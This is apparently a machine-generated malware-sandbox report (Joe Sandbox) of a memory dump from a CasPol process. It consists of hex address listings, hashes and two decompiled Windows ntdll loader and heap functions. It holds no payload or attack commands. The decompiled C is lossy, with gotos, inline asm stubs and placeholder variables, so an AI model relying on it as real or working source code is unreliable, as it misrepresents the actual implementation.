                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014229e1
                                                                        0x014229e4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014229e6
                                                                        0x014229e6
                                                                        0x013db51f
                                                                        0x013db51f
                                                                        0x013db520
                                                                        0x013db525
                                                                        0x013db52b
                                                                        0x013db52d
                                                                        0x013db52e
                                                                        0x013db530
                                                                        0x013db535
                                                                        0x013db53b
                                                                        0x013db53d
                                                                        0x01422a07
                                                                        0x00000000
                                                                        0x01422a07
                                                                        0x013db549
                                                                        0x013db54e
                                                                        0x01422a12
                                                                        0x01422a15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422a24
                                                                        0x013db559
                                                                        0x013db55c
                                                                        0x01422a34
                                                                        0x01422a3b
                                                                        0x01422a4d
                                                                        0x01422a4d
                                                                        0x01422a3b
                                                                        0x013db566
                                                                        0x013db56b
                                                                        0x013db56f
                                                                        0x013db57b
                                                                        0x013db582
                                                                        0x01422a57
                                                                        0x01422a5c
                                                                        0x01422a5c
                                                                        0x013db582
                                                                        0x013db58b
                                                                        0x013db58e
                                                                        0x013db592
                                                                        0x013db596
                                                                        0x013db599
                                                                        0x013db59b
                                                                        0x013db59e
                                                                        0x013db5a3
                                                                        0x013db5a6
                                                                        0x013db5a9
                                                                        0x01422a66
                                                                        0x01422a67
                                                                        0x01422a73
                                                                        0x01422a78
                                                                        0x013db5b8
                                                                        0x013db5b8
                                                                        0x013db5bb
                                                                        0x013db5bd
                                                                        0x013db5bd
                                                                        0x013db5c4
                                                                        0x013db5f7
                                                                        0x013db5f7
                                                                        0x013db600
                                                                        0x013db606
                                                                        0x013db60c
                                                                        0x013db612
                                                                        0x013db618
                                                                        0x013db621
                                                                        0x013db623
                                                                        0x013db629
                                                                        0x013db629
                                                                        0x013db62c
                                                                        0x013db62f
                                                                        0x013db633
                                                                        0x013db636
                                                                        0x013db639
                                                                        0x013db71d
                                                                        0x013db720
                                                                        0x013db736
                                                                        0x013db660
                                                                        0x013db660
                                                                        0x013db662
                                                                        0x013db665
                                                                        0x013db66a
                                                                        0x013db6e6
                                                                        0x013db6e7
                                                                        0x013db6ea
                                                                        0x013db6ef
                                                                        0x01422ad1
                                                                        0x01422ad2
                                                                        0x01422ad8
                                                                        0x01422add
                                                                        0x01422add
                                                                        0x013db6f5
                                                                        0x013db6f5
                                                                        0x013db672
                                                                        0x013db675
                                                                        0x013db67a
                                                                        0x01422ae5
                                                                        0x01422ae8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422af4
                                                                        0x01422afc
                                                                        0x00000000
                                                                        0x013db680
                                                                        0x013db680
                                                                        0x013db680
                                                                        0x013db685
                                                                        0x013db687
                                                                        0x013db68a
                                                                        0x01422b06
                                                                        0x01422b0c
                                                                        0x01422b13
                                                                        0x01422b1e
                                                                        0x01422b20
                                                                        0x01422b2b
                                                                        0x01422b2b
                                                                        0x01422b2b
                                                                        0x01422b34
                                                                        0x01422b45
                                                                        0x01422b45
                                                                        0x01422b13
                                                                        0x013db696
                                                                        0x013db69b
                                                                        0x013db6a0
                                                                        0x01422b4f
                                                                        0x01422b52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422b61
                                                                        0x00000000
                                                                        0x013db6a6
                                                                        0x013db6a6
                                                                        0x013db6a6
                                                                        0x013db6a8
                                                                        0x013db6ab
                                                                        0x01422b70
                                                                        0x01422b72
                                                                        0x01422b7d
                                                                        0x01422b7d
                                                                        0x01422b7d
                                                                        0x01422b86
                                                                        0x01422b97
                                                                        0x01422b97
                                                                        0x013db6b1
                                                                        0x00000000
                                                                        0x013db6b1
                                                                        0x013db6a0
                                                                        0x013db67a
                                                                        0x013db722
                                                                        0x013db722
                                                                        0x013db655
                                                                        0x013db65d
                                                                        0x00000000
                                                                        0x013db5c6
                                                                        0x013db5c6
                                                                        0x013db5ce
                                                                        0x01422a83
                                                                        0x01422a97
                                                                        0x01422a97
                                                                        0x01422a9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422a88
                                                                        0x01422a8a
                                                                        0x01422a8c
                                                                        0x01422a8f
                                                                        0x01422a92
                                                                        0x01422aa1
                                                                        0x01422aa1
                                                                        0x01422aa2
                                                                        0x01422aab
                                                                        0x01422ab0
                                                                        0x00000000
                                                                        0x01422ab0
                                                                        0x01422a94
                                                                        0x01422a94
                                                                        0x00000000
                                                                        0x01422a9c
                                                                        0x013db5d4
                                                                        0x013db5d4
                                                                        0x013db5d6
                                                                        0x013db5d9
                                                                        0x013db5de
                                                                        0x013db5e1
                                                                        0x013db5e4
                                                                        0x01422ab8
                                                                        0x01422ab9
                                                                        0x01422ac4
                                                                        0x01422ac9
                                                                        0x013db5f2
                                                                        0x013db5f2
                                                                        0x013db5f4
                                                                        0x013db5f4
                                                                        0x00000000
                                                                        0x013db5e4
                                                                        0x013db5c4
                                                                        0x013db554
                                                                        0x013db554
                                                                        0x00000000
                                                                        0x013db554

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 1e13d30149a327eed0c4b23674b57c458410396d9964d550b9f162935ff1339f
                                                                        • Instruction ID: 7bd88a8b431e06535b0a6dc8ebc96c512f7df9ede694d5cc68c98ca2555fdefe
                                                                        • Opcode Fuzzy Hash: 1e13d30149a327eed0c4b23674b57c458410396d9964d550b9f162935ff1339f
                                                                        • Instruction Fuzzy Hash: 99E19A71B00209DFDB19CF68D884FAABBB5FF49308F1541AAE5029B7A5D770E981CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E013C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E013C934A() != 0) {
								_t159 = E0143A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x14a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01435510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x14a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E013C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E013C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E013C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x14a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x14a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E013D2280(_t92, 0x14a86cc);
															_t94 = E01489DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E013E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x14a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E013C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x14a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x14a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E013FF380(_t136, 0x1391184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E013D2280(_t108, 0x14a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E013E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01489D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E013CFFB0(_t118, _t156, 0x14a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E013F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                        0x013c8799
                                                                        0x013c879d
                                                                        0x013c87a1
                                                                        0x013c87a3
                                                                        0x013c87a8
                                                                        0x013c87c3
                                                                        0x013c87c3
                                                                        0x013c87c8
                                                                        0x013c87d1
                                                                        0x013c87d4
                                                                        0x013c87d8
                                                                        0x013c87e5
                                                                        0x013c87ec
                                                                        0x01419bfe
                                                                        0x01419c00
                                                                        0x01419c02
                                                                        0x01419c08
                                                                        0x01419c0d
                                                                        0x01419c0f
                                                                        0x01419c14
                                                                        0x01419c2d
                                                                        0x01419c32
                                                                        0x01419c37
                                                                        0x01419c3a
                                                                        0x01419c3c
                                                                        0x01419c42
                                                                        0x01419c42
                                                                        0x01419c3c
                                                                        0x01419c02
                                                                        0x013c87da
                                                                        0x013c87df
                                                                        0x013c87e3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c87e3
                                                                        0x013c87f2
                                                                        0x00000000
                                                                        0x013c87fb
                                                                        0x013c87fd
                                                                        0x013c87fe
                                                                        0x013c880e
                                                                        0x013c880f
                                                                        0x013c8810
                                                                        0x013c8814
                                                                        0x013c881a
                                                                        0x013c881c
                                                                        0x013c881f
                                                                        0x013c8821
                                                                        0x013c8822
                                                                        0x013c8824
                                                                        0x013c8826
                                                                        0x013c882c
                                                                        0x013c882e
                                                                        0x01419c48
                                                                        0x01419c48
                                                                        0x013c8834
                                                                        0x013c8834
                                                                        0x013c8837
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c8837
                                                                        0x013c882e
                                                                        0x013c883d
                                                                        0x013c8840
                                                                        0x013c8843
                                                                        0x013c8846
                                                                        0x013c8849
                                                                        0x013c884c
                                                                        0x013c884e
                                                                        0x013c8850
                                                                        0x013c8852
                                                                        0x013c8854
                                                                        0x013c8857
                                                                        0x013c88b4
                                                                        0x013c88b6
                                                                        0x013c88b6
                                                                        0x013c8859
                                                                        0x013c8859
                                                                        0x013c8859
                                                                        0x013c8861
                                                                        0x013c8866
                                                                        0x013c886a
                                                                        0x013c893d
                                                                        0x013c8941
                                                                        0x00000000
                                                                        0x013c8947
                                                                        0x013c8947
                                                                        0x013c894a
                                                                        0x013c894c
                                                                        0x00000000
                                                                        0x013c8952
                                                                        0x013c8955
                                                                        0x013c895a
                                                                        0x013c895d
                                                                        0x013c895d
                                                                        0x013c895f
                                                                        0x013c8961
                                                                        0x013c8961
                                                                        0x013c8968
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c896a
                                                                        0x013c896b
                                                                        0x013c896e
                                                                        0x00000000
                                                                        0x013c8970
                                                                        0x013c8970
                                                                        0x013c8970
                                                                        0x013c8970
                                                                        0x013c8972
                                                                        0x013c8972
                                                                        0x013c8974
                                                                        0x00000000
                                                                        0x013c897a
                                                                        0x013c897a
                                                                        0x013c897d
                                                                        0x00000000
                                                                        0x013c8983
                                                                        0x01419c65
                                                                        0x01419c6d
                                                                        0x01419c72
                                                                        0x01419c75
                                                                        0x01419c75
                                                                        0x01419c82
                                                                        0x01419c86
                                                                        0x01419c87
                                                                        0x01419c88
                                                                        0x01419c89
                                                                        0x01419c8c
                                                                        0x01419c90
                                                                        0x01419c95
                                                                        0x01419c97
                                                                        0x01419ca0
                                                                        0x01419ca3
                                                                        0x01419ca9
                                                                        0x01419ca9
                                                                        0x00000000
                                                                        0x01419ca9
                                                                        0x01419ca3
                                                                        0x00000000
                                                                        0x01419c97
                                                                        0x013c897d
                                                                        0x00000000
                                                                        0x013c8974
                                                                        0x013c8988
                                                                        0x013c8992
                                                                        0x013c8996
                                                                        0x00000000
                                                                        0x013c8996
                                                                        0x013c894c
                                                                        0x00000000
                                                                        0x013c8870
                                                                        0x013c887b
                                                                        0x013c887d
                                                                        0x013c887f
                                                                        0x013c8881
                                                                        0x013c8884
                                                                        0x013c8884
                                                                        0x013c8886
                                                                        0x013c8889
                                                                        0x013c888c
                                                                        0x013c888e
                                                                        0x013c8891
                                                                        0x013c8891
                                                                        0x013c8898
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c889a
                                                                        0x013c889b
                                                                        0x013c889e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c88a0
                                                                        0x013c88a8
                                                                        0x013c88b0
                                                                        0x013c88b2
                                                                        0x013c88d3
                                                                        0x013c88d5
                                                                        0x00000000
                                                                        0x013c88d7
                                                                        0x013c88db
                                                                        0x013c88dc
                                                                        0x013c88e0
                                                                        0x013c88e8
                                                                        0x013c88ee
                                                                        0x013c88f0
                                                                        0x013c88f3
                                                                        0x013c88fc
                                                                        0x013c8901
                                                                        0x013c8906
                                                                        0x013c890c
                                                                        0x013c890c
                                                                        0x013c890f
                                                                        0x013c8916
                                                                        0x013c8917
                                                                        0x013c8918
                                                                        0x013c8919
                                                                        0x013c891a
                                                                        0x013c891f
                                                                        0x013c8921
                                                                        0x01419c52
                                                                        0x01419c55
                                                                        0x01419c5b
                                                                        0x01419cac
                                                                        0x01419cc0
                                                                        0x01419cc0
                                                                        0x01419c55
                                                                        0x013c8927
                                                                        0x013c8927
                                                                        0x013c892f
                                                                        0x013c8933
                                                                        0x00000000
                                                                        0x013c88f5
                                                                        0x013c88f5
                                                                        0x00000000
                                                                        0x013c88f7
                                                                        0x013c88f7
                                                                        0x013c88fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c88fa
                                                                        0x013c88f5
                                                                        0x013c88f3
                                                                        0x00000000
                                                                        0x013c88d5
                                                                        0x00000000
                                                                        0x013c88b2
                                                                        0x013c88c9
                                                                        0x00000000
                                                                        0x013c88c9
                                                                        0x013c887f
                                                                        0x013c886a
                                                                        0x013c8857
                                                                        0x013c8852
                                                                        0x013c88bf
                                                                        0x013c88bf
                                                                        0x013c87aa
                                                                        0x013c87ad
                                                                        0x013c87ae
                                                                        0x013c87b4
                                                                        0x013c87b5
                                                                        0x013c87b6
                                                                        0x013c87b8
                                                                        0x013c87bd
                                                                        0x013c87c1
                                                                        0x013c87f4
                                                                        0x013c87fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c87c1
                                                                        0x00000000

                                                                        Strings
                                                                        • LdrpDoPostSnapWork, xrefs: 01419C1E
                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01419C18
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01419C28
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 2994545307-1948996284
                                                                        • Opcode ID: e65db58169a63081b00b4af00853a8c02156e70d3f19de91b44b12b5a71709fb
                                                                        • Instruction ID: 7a7b95b614ef77d5bcd1cc0df2825af301ae51fe2fbf4f8a2edd9ae0d3d447ba
                                                                        • Opcode Fuzzy Hash: e65db58169a63081b00b4af00853a8c02156e70d3f19de91b44b12b5a71709fb
                                                                        • Instruction Fuzzy Hash: CB911471A002069BEF18DF5DD880ABB7BB5FF54B18B5540AED905AB654EB30EE01CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EAC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E013EAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0140D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x14a8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E013F96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01463C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E013F96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E013BB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E014714FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E013D7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01471411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E013D7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01471411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                        0x013eac85
                                                                        0x013eac88
                                                                        0x013eac8a
                                                                        0x013eac8d
                                                                        0x013eac91
                                                                        0x013eac99
                                                                        0x013eac9c
                                                                        0x01429f57
                                                                        0x01429f5b
                                                                        0x01429f60
                                                                        0x01429f60
                                                                        0x013eaca8
                                                                        0x013eacae
                                                                        0x013eacda
                                                                        0x013eacde
                                                                        0x013eace8
                                                                        0x013eaceb
                                                                        0x013eacee
                                                                        0x00000000
                                                                        0x013eacee
                                                                        0x013eacf6
                                                                        0x013eacb0
                                                                        0x013eacb0
                                                                        0x013eacbb
                                                                        0x013eacbd
                                                                        0x013eacc0
                                                                        0x013eacc5
                                                                        0x013eadae
                                                                        0x013eadb4
                                                                        0x013eadb4
                                                                        0x013eacd4
                                                                        0x013eacd8
                                                                        0x013eacf9
                                                                        0x013eacff
                                                                        0x013ead04
                                                                        0x013ead08
                                                                        0x013ead09
                                                                        0x013ead10
                                                                        0x013ead12
                                                                        0x013ead18
                                                                        0x01429f6f
                                                                        0x01429f74
                                                                        0x01429f76
                                                                        0x01429f7c
                                                                        0x01429f84
                                                                        0x01429f88
                                                                        0x01429f89
                                                                        0x01429f90
                                                                        0x01429f90
                                                                        0x01429f76
                                                                        0x013ead1e
                                                                        0x013ead24
                                                                        0x013ead26
                                                                        0x0142a097
                                                                        0x0142a09b
                                                                        0x0142a0ba
                                                                        0x0142a0bf
                                                                        0x0142a09d
                                                                        0x0142a0b2
                                                                        0x0142a0b7
                                                                        0x0142a0c5
                                                                        0x0142a0c8
                                                                        0x0142a0cb
                                                                        0x0142a0d2
                                                                        0x00000000
                                                                        0x013ead2c
                                                                        0x013ead2c
                                                                        0x013ead2f
                                                                        0x013ead34
                                                                        0x013ead36
                                                                        0x01429f97
                                                                        0x01429f9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01429fa9
                                                                        0x013ead3e
                                                                        0x013ead3e
                                                                        0x013ead41
                                                                        0x01429fb3
                                                                        0x01429fb9
                                                                        0x01429fc0
                                                                        0x01429fd0
                                                                        0x01429fd0
                                                                        0x01429fc0
                                                                        0x013ead4a
                                                                        0x013ead50
                                                                        0x013ead5c
                                                                        0x013ead62
                                                                        0x013ead68
                                                                        0x013ead6b
                                                                        0x013ead6d
                                                                        0x01429fda
                                                                        0x01429fdd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01429fec
                                                                        0x00000000
                                                                        0x013ead73
                                                                        0x013ead73
                                                                        0x013ead73
                                                                        0x013ead75
                                                                        0x013ead75
                                                                        0x013ead78
                                                                        0x01429ff6
                                                                        0x01429ffc
                                                                        0x0142a003
                                                                        0x0142a00e
                                                                        0x0142a010
                                                                        0x0142a01b
                                                                        0x0142a01b
                                                                        0x0142a01b
                                                                        0x0142a038
                                                                        0x0142a038
                                                                        0x0142a003
                                                                        0x013ead84
                                                                        0x013ead89
                                                                        0x013ead8c
                                                                        0x013ead8e
                                                                        0x0142a042
                                                                        0x0142a045
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142a054
                                                                        0x00000000
                                                                        0x013ead94
                                                                        0x013ead94
                                                                        0x013ead94
                                                                        0x013ead96
